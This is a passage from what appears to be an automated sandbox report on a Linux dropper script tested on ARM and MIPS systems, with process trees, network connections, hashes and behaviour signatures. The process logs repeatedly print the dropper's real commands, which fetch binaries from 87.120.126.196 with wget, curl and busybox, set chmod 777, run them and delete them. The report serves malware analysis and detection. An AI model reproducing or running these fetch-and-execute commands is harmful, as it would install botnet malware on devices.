[./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/rm

[rm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/wget

[wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/chmod

[chmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp

[./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/rm

[rm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
N/A 224.0.0.251:5353 udp
GB 84.17.50.9:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 01:42

Reported

2024-10-21 01:45

Platform

debian9-armhf-20240729-en

Max time kernel

12s

Max time network

14s

Command Line

[/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i N/A
N/A /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm N/A
N/A /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA N/A
N/A /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw N/A
N/A /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb N/A
N/A /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k N/A
N/A /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /usr/bin/curl N/A
File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /usr/bin/curl N/A
File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /usr/bin/curl N/A
File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /usr/bin/curl N/A
File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /usr/bin/curl N/A
File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /usr/bin/curl N/A
File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /usr/bin/curl N/A

Processes

/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh

[/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/chmod

[chmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

[./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/rm

[rm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/chmod

[chmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm

[./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/rm

[rm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/wget

[wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/chmod

[chmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA

[./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/rm

[rm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/wget

[wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/chmod

[chmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw

[./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/rm

[rm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/wget

[wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/chmod

[chmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb

[./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/rm

[rm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/wget

[wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/chmod

[chmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k

[./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/rm

[rm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/chmod

[chmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613

[./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/rm

[rm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/wget

[wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 01:42

Reported

2024-10-21 01:45

Platform

debian9-mipsbe-20240418-en

Max time kernel

76s

Max time network

78s

Command Line

[/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i N/A
N/A /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm N/A
N/A /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA N/A
N/A /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw N/A
N/A /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb N/A
N/A /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k N/A
N/A /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 N/A
N/A /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp N/A
N/A /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 N/A
N/A /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY N/A
N/A /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck N/A
N/A /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG N/A
N/A /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv N/A
N/A /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah N/A
N/A /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 N/A
N/A /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY N/A
N/A /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck N/A
N/A /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG N/A
N/A /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv N/A
N/A /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah N/A
N/A /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i N/A
N/A /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm N/A
N/A /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA N/A
N/A /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw N/A
N/A /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb N/A
N/A /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k N/A
N/A /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 N/A
N/A /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /usr/bin/curl N/A
File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /usr/bin/curl N/A
File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /usr/bin/curl N/A
File opened for modification /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /usr/bin/curl N/A
File opened for modification /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /usr/bin/curl N/A
File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /usr/bin/curl N/A
File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /usr/bin/curl N/A
File opened for modification /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /usr/bin/curl N/A
File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /usr/bin/curl N/A
File opened for modification /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /usr/bin/curl N/A
File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /usr/bin/curl N/A
File opened for modification /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /usr/bin/curl N/A
File opened for modification /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /usr/bin/curl N/A
File opened for modification /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /usr/bin/curl N/A
File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /usr/bin/curl N/A
File opened for modification /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /usr/bin/curl N/A
File opened for modification /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /usr/bin/curl N/A
File opened for modification /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /usr/bin/curl N/A
File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /usr/bin/curl N/A
File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /usr/bin/curl N/A
File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /usr/bin/curl N/A
File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /usr/bin/curl N/A
File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /usr/bin/curl N/A
File opened for modification /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /usr/bin/curl N/A
File opened for modification /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /usr/bin/curl N/A
File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /usr/bin/curl N/A
File opened for modification /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /usr/bin/curl N/A
File opened for modification /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /usr/bin/curl N/A

Processes

/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh

[/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/chmod

[chmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

[./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/rm

[rm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/chmod

[chmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm

[./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/rm

[rm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/wget

[wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/curl

